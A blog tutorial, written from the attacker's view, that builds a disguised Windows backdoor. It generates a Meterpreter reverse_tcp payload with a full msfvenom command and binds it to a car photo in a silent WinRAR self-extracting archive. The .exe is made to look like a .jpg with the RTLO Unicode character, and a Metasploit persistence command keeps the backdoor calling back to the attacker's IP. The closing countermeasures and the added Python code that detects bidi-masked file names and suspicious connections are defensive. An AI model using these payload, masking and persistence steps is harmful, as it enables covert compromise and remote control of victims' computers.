Create a persistent backdoor by masking it with the RTLO character

Hello everybody!!

After a few weeks of disconnection (and especially with back and neck pains), I took a little time to show you a peculiar little thing that once caught my attention.

You have surely always heard that you should not download, let alone run, files from unreliable or untrustworthy places (which we all do, right? 😆). I was like that before: “bah, I’m careful, I know where I’m downloading from”; “if it is a PDF or an image or something like that, nothing happens; as long as it is not an .exe or a strange format, nothing happens… right?”

Well, things are actually a little different. This post is not really about how to build a backdoor, but about how one can be slipped past us, and slipped past us well, if we do not take a minimum of care when, for example, viewing an image.

The steps, tools and environments are described throughout the post from the attacker's point of view.

The payload can be created with msfvenom, which since June 2015 gathers all the uses and tools of Msfpayload and Msfencode in a single framework. The command to be used will be, for example:

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.36 LPORT=4444 --platform windows --arch x86 -f exe > reverse_tcp.exe

But first, it is necessary to know what we are doing. Taking a look at the msfvenom help, you can see what each input parameter that accompanies the command call means.

Msfvenom help.

Therefore, our command indicates that the payload to be generated will be of type meterpreter, using a reverse connection via TCP, for the Windows operating system. Meterpreter payloads have the peculiarity that they use in-memory DLL injection, which is why they are sometimes difficult to detect. I have opted for this payload because it is typical.

In addition, it indicates the local IP (LHOST), that is, the IP of our machine. In this controlled environment built with virtual machines, the IP of my machine (the attacker) is 192.168.1.36 (you can look it up with ifconfig); remember that this IP is only reachable within internal or private networks (from the router inwards). The command also indicates the port through which the TCP communication will be opened (LPORT, for example 4444).

In the same way, the platform (windows) and the architecture (x86) are indicated, although they are optional parameters.

Finally, there is the output format, which in this case is an executable (exe).

All this is redirected to a specific path; you can also use -o, as the help says, to save the payload to the specified path + name.format.

I could continue explaining more about msfvenom, as well as about meterpreter (since there is a lot of work and study behind them). For example, to find out which payloads, encoders, architectures, platforms, etc. exist, you can use --list <type> to list all the possible ones. So as not to make this too long, I will get to the point. Someday I will talk more about the topic in a post.

Finally we would have the payload reverse_tcp created.

Reverse tcp payload created.

The victim would execute this payload without knowing it: we could associate it with an image (for example), so that when the image opens, the payload is executed without the victim being aware.

This can be done in different ways; I will use one of the basic (and somewhat old) ones, which is “binding” the image to the payload by means of an SFX, that is, a self-extracting archive that can be generated with Winrar. It can also be generated with other tools, for example AutoIt, although in that case it would not be necessary to build the payload with msfvenom; this tool can compile an au3 script directly, indicating the associated image and the payload. For convenience I will use Winrar.

Now we just need to look for an image that is attractive to the victim. I have searched for one, but it could be any other.

Ford Mustang GT.

With the chosen image, it should be converted into an icon using the ICO Convert online converter. At this point, we have the icon, the original image and the payload so we can now go to the point of using Winrar to create the SFX.

Selecting the original image and the payload, we launch Winrar to add both to the new SFX file. To do this, select Create SFX file and write an appropriate name, for example FordMustang.exe (it can be changed later).

Add to SFX.

Now that we are creating an SFX, new options are enabled under the Advanced tab > SFX Options. A new window opens; we start in the Configuration tab > Run after the extraction, where we add the two files (image and payload) that we want to be executed after the extraction.

Advanced setup tab of SFX.

We continue with the Modes tab, where we select extraction to a temporary folder and set the silent mode to hide everything.

Advanced mode tab SFX.

We go to the Text and icon tab and indicate that it loads the icon that was previously created.

Text and Icon tab of SFX.

Finally, in the Update tab we set Update Mode to “Extract and replace files” and Overwrite Mode to “Overwrite all files”.

Update tab of SFX.

Everything is now ready; we accept and the SFX is created.

Final result.

Now you will say, “but it’s an exe!” Yes, but now the RTLO (Right-To-Left Override) character comes into play. This is a Unicode character (U+202E) that is used for text in Arabic, Hebrew, etc. But in certain cases it can do a lot of damage, and this is one of them.

To insert this character, you can use the typical character map: “Character Map” in Linux, for example, and likewise “Character Map” in Windows. As we are now in Windows, I show you an image.

Character map RTLO.

Since the function of the character is to flip the order of everything to its right, it has to be placed in a specific position. In our case, we have FordMustang.exe and we want it to appear with a .jpg ending. For that to happen, we must write the letters JPG in reverse, that is, GPJ, so that after the flip they read JPG, and place the RTLO character before the letter G. Look how it looks!

Effect of RTLO character

I stayed that way when I discovered it 🤤. Of course you can say, okay, the name still has exe in it, but remember that code can be executed not only from an .exe; you can also use: .bat, .cmd, .com, .lnk, .pif, .scr, .vb, .vbe, .vbs, .wsh. In addition, with a little imagination, a clever choice of words and who knows whether some other character in combination with RTLO, it is likely possible to change the text in such a way that this type of masking is difficult to spot.

Finally, and unfortunately, the payload is hidden in an SFX and in turn masked by the RTLO character. If this reaches the victim and he executes it, he will see the photo of the Mustang GT that was chosen as bait, but he will already have executed the payload. The result is:

Final result with RTLO

Back on the attacker's machine, the attacker will be waiting in Metasploit for the victim to “view” the Mustang GT he is supposedly being sold, that is, waiting for the TCP communication to be opened by the victim.

Msfconsole launched. Metasploit.

As the attacker knows the type of payload he has created, he will have configured Metasploit to match, so that it can communicate correctly; that is, he will have selected the appropriate handler responsible for the TCP communication and the rest of the parameters with which the payload was created.

Metasploit ready and listening.

Once the victim has “viewed” the image, the attacker receives a response from the victim and the TCP communication is opened.

Victim launches the malware.

Once the reverse connection is open, we can know system information with sysinfo.

System info of victim PC.

At this point, we are going to make the backdoor persistent, since otherwise, if the victim turns off the PC, the connection will be lost until the victim “views” the image again. To avoid this, we use a Ruby script called “persistence” written by Carlos Perez. Showing the help:

Persistent help.

So seeing this, our command will be:

 run persistence -U -i 5 -p 4444 -r 192.168.1.36

That is, every time the victim logs in, the backdoor will try to open the connection to 192.168.1.36:4444 every 5 seconds. The interval to choose depends on what the attacker wants: for something a bit more stealthy, 5 min may be fine; the smaller the interval, the more likely it is to be detected.

Persistent script launched.

If the machine now restarts, the attacker will lose the connection, but the attacker will re-launch the “exploit” command in Metasploit, which reopens the listening port, so that when the victim logs in again, the connection is reopened.

Unfortunately, with all this the attacker has managed to deceive the victim and install a backdoor that will always be active, waiting for a response from the attacker in order to open a reverse connection.

COUNTERMEASURES

Seeing this and knowing how far it can go (I think it would make anyone feel a little insecure), there are some countermeasures the victim can use to detect and prevent it (at least as far as I know), that is, to know whether what he is about to view, open or execute is legitimate or not.

On the one hand, the RTLO character only works in certain circumstances. The example I have shown works in any folder (except in a network folder, which would give a warning when trying to execute an exe, even if we, as the victim, don’t know it is one). On the other hand, if you place the file you have received on the desktop, the RTLO character doesn’t work. Also, if we look at the details view, it will tell us that its type is Application, and if we look at its properties it will tell us that it is an .exe.

Possible malware detection.
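
A check for this masking, as an added example that is not part of the original post: it flags file names containing bidirectional control characters and compares the extension the system acts on with the one a user sees. The rendering in displayed_name is a simplified approximation of Unicode bidi behaviour, and the sample names are constructed.

```python
import os

# Unicode bidirectional controls: they change display order, not the stored name
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO",
    "\u202e": "RLO", "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI",
    "\u2069": "PDI", "\u200e": "LRM", "\u200f": "RLM",
}
# Extensions the post lists as able to run code on Windows
RUNNABLE = {".exe", ".bat", ".cmd", ".com", ".lnk", ".pif", ".scr",
            ".vb", ".vbe", ".vbs", ".wsh"}

def displayed_name(name):
    """Approximate rendering: text after U+202E is reversed until U+202C or the end."""
    out, rtl = [], None
    for ch in name:
        if ch == "\u202e" and rtl is None:
            rtl = []                         # start of an overridden run
        elif ch == "\u202c" and rtl is not None:
            out.extend(reversed(rtl))        # run closed: emit it flipped
            rtl = None
        elif ch not in BIDI_CONTROLS:        # other controls are invisible
            (out if rtl is None else rtl).append(ch)
    return "".join(out + (rtl[::-1] if rtl else []))

def inspect_name(name):
    """Compare the stored extension (controls removed) with the displayed one."""
    controls = [BIDI_CONTROLS[c] for c in name if c in BIDI_CONTROLS]
    stored = "".join(c for c in name if c not in BIDI_CONTROLS)
    real_ext = os.path.splitext(stored)[1].lower()
    shown = displayed_name(name)
    shown_ext = os.path.splitext(shown)[1].lower()
    return {"shown": shown, "real_ext": real_ext, "shown_ext": shown_ext,
            "controls": controls, "runnable": real_ext in RUNNABLE,
            "masked": bool(controls) and real_ext != shown_ext}

def scan(root):
    """Yield (path, report) for every file under root whose name has a bidi control."""
    for folder, _dirs, files in os.walk(root):
        for name in files:
            report = inspect_name(name)
            if report["controls"]:
                yield os.path.join(folder, name), report

# Constructed sample names; the first follows the post's FordMustang example
SAMPLES = ["FordMustang\u202egpj.exe", "holiday.jpg", "invoice\u202efdp.scr"]
if __name__ == "__main__":
    for n in SAMPLES:
        print(ascii(n), inspect_name(n))
```

Running scan() over a downloads folder or a mail attachment store lists every name that carries one of these characters, whatever extension it pretends to have.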

If at any time you have doubts about whether you have fallen for it or not, you can always look at the active communications on the machine and their associated PIDs with netstat -o -a, and close the process with taskkill /PID <processID> /F. In the task manager you could also see processes with a strange name. If the persistent payload has been launched but has not connected to the attacker, you can see in the task manager how a process with a strange name keeps appearing, launching and closing (this is due to the interval set when creating the persistence). Once the connection has been established, the process remains constant.

Intermittent and fixed process.

To avoid this, if we go to System Configuration (MSCONFIG), we can see that there is something strange configured to be launched at system startup, and that its launch path is also in TEMP.

Weird configuration in MSCONFIG.

If we notice this, the best thing is to delete this startup entry and also empty the TEMP folder of our machine.
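
The netstat and startup-entry checks described above can be scripted. This added example (not from the original post) parses `netstat -o -a -n` output for PIDs with active connections to other hosts and flags startup commands that launch from a TEMP folder. The -n switch (numeric addresses), the sample output, the address 192.168.1.40, the PIDs and the entry names are assumptions made for the example.

```python
import re

# TCP rows of `netstat -o -a -n`: local address, remote address, state, PID
NETSTAT_ROW = re.compile(r"^\s*TCP\s+(\S+)\s+(\S+)\s+([A-Z_0-9]+)\s+(\d+)\s*$", re.M)
# States in which the process is talking (or trying to talk) to another host
ACTIVE = {"ESTABLISHED", "SYN_SENT"}
LOCAL_HOSTS = {"0.0.0.0", "127.0.0.1", "[::]", "[::1]"}
# A startup command that launches a file from a temporary folder
TEMP_PATH = re.compile(r'(?i)(?:\\appdata\\local\\temp|\\windows\\temp|%te?mp%)\\([^"\s]+)')

def outbound_connections(netstat_text):
    """Return {pid: [(remote, state), ...]} for active TCP rows to other hosts."""
    by_pid = {}
    for _local, remote, state, pid in NETSTAT_ROW.findall(netstat_text):
        host = remote.rsplit(":", 1)[0]
        if state in ACTIVE and host not in LOCAL_HOSTS:
            by_pid.setdefault(int(pid), []).append((remote, state))
    return by_pid

def temp_startup_entries(entries):
    """Return [(entry name, file under TEMP)] for (name, command) startup pairs."""
    hits = []
    for name, command in entries:
        match = TEMP_PATH.search(command)
        if match:
            hits.append((name, match.group(1)))
    return hits

# Constructed sample data. 192.168.1.36:4444 is the listener used in the post;
# 192.168.1.40, the PIDs and the entry names are made up for the example.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    127.0.0.1:49670        127.0.0.1:49671        ESTABLISHED     1288
  TCP    192.168.1.40:49712     192.168.1.36:4444      ESTABLISHED     3120
  TCP    192.168.1.40:49720     192.168.1.1:443        TIME_WAIT       0
  UDP    0.0.0.0:5353           *:*                                    1500
"""
SAMPLE_STARTUP = [
    ("OneDrive", r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'),
    ("qWzKpLtx", r"C:\Users\victim\AppData\Local\Temp\qWzKpLtx.vbs"),
]

if __name__ == "__main__":
    print(outbound_connections(SAMPLE_NETSTAT))   # PIDs to inspect before taskkill
    print(temp_startup_entries(SAMPLE_STARTUP))   # entries to remove from startup
```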

As you can see, there are several ways to detect that something strange is happening. I have to say that surely not all backdoors work in the same way, but with the “guidelines” I have described, some information can be extracted. As always, the recommendation is to have an antivirus, have UAC (User Account Control) set to the maximum, and keep all software updated, especially Windows; and remember that you have the last word.

Unfortunately, most people who use a computer don’t have even a medium level of knowledge that would let them avoid such a situation if they found themselves in it. Because of this, it is always good to share the knowledge one has learned and try to fight it.

Regarding the creation of the backdoor and the rest of the posts of Allhacked, AT NO TIME, OF COURSE, am I responsible for any misuse, as stated in Allhacked’s policies. Evil is out there, but not here; this post is focused on teaching the bad (to know how it works) and how it could be fought.

PS: Forgive so many images, but I wanted to be clear. I also remind you that Allhacked, including its posts (this one too), is also available in Spanish.

I hope I have explained myself clearly and I hope you liked it. See you in the next post! 😉

Happy Hacking!


